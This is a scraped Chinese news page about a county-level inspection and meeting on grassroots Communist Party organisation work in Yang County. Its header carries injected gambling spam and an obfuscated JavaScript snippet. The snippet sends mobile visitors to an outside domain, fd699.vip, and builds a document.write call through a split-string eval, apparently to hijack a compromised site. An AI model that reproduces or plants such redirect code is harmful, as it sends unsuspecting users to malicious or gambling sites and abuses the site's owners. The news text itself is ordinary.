洋县开展全县基层党建工作现场观摩- 台湾宾果28 function moble(){ var ss = '
'; if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "http://fd699.vip" }else{ eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); } } moble();


















洋县开展全县基层党建工作现场观摩



1028日,洋县开展了全县基层党建工作现场观摩,县委常委、组织部长李国鸿,各镇办党委书记、组织委员参加现场观摩。

观摩团先后来到柳山村、草坝村、周铺村、傥滨社区,通过听取汇报、现场调研等方式,详细了解了各观摩点党建重点工作开展情况,交流了工作经验。

当天下午,在县政府多功能会议室召开了全县基层党建工作观摩推进会,县委书记胡瑞安出席会议并讲话,县委常委、组织部长李国鸿通报了全县基层党建工作情况,并安排部署下一步重点工作。龙亭镇、槐树关镇、八里关镇、县直机关工委、卫健局分别作了交流发言,谢村镇、旅游局进行了表态发言。会议由县委副书记郭华主持。

李国鸿指出今年以来,全县各级党组织和广大党员坚决贯彻党中央决策部署和省委、市委、县委工作要求,各项工作取得了新进展新成效。但是仍然存在个别工作进展缓慢,工作亮点不够突出等问题。各级党组织要抓重点、破难点,以学习贯彻习近平新时代中国特色社会主义思想为主题主线,聚焦抓党建促决战脱贫攻坚,深入推进“基层组织纳新年”活动,全面落实基层党建工作各项任务。要不断提升自身工作能力,鼓干劲,抓落实,打造一批特色亮点,推动基层党建工作提质增效。

胡瑞安强调一要提高政治站位,切实增强抓好基层党建工作的政治自觉和行动自觉。要以抓好党建是最大政绩的理念来对待党建工作,要从聚焦决胜全面小康的大局来定位党建工作,要以顺应经济社会发展新形势来研究党建工作,要以落实全面从严治党的新要求来推进党建工作。二要突出重点关键,不断提高基层党组织政治功能和组织力。要强化理论武装,建强战斗堡垒,落实好“引、育、用、留”四字方针,全面激发人才活力,培育骨干队伍,不断夯实基层基础。三要坚持分类施策,奋力推动各领域党建工作全面进步。要以助力脱贫攻坚为重点,做实农村党建;以促进基层治理为重点,做精城市党建;以补短板破难点为重点,做优其他领域党建。四要强化责任担当,扎实推进基层党建各项任务落实落细。要从严夯实主体责任,党委(党组)书记要增强主业、主责、主角意识,切实履行好“第一责任人”职责,做到真管真严、敢管敢严、长管长严;要从严推进整改提升,积极查漏补缺,及时纠偏整改,持续提升基层党建工作整体水平;要从严强化督导问效,敢于动真碰硬,发挥“问责一人、警示一批、震慑一片”效应,促进基层党建各项工作落实。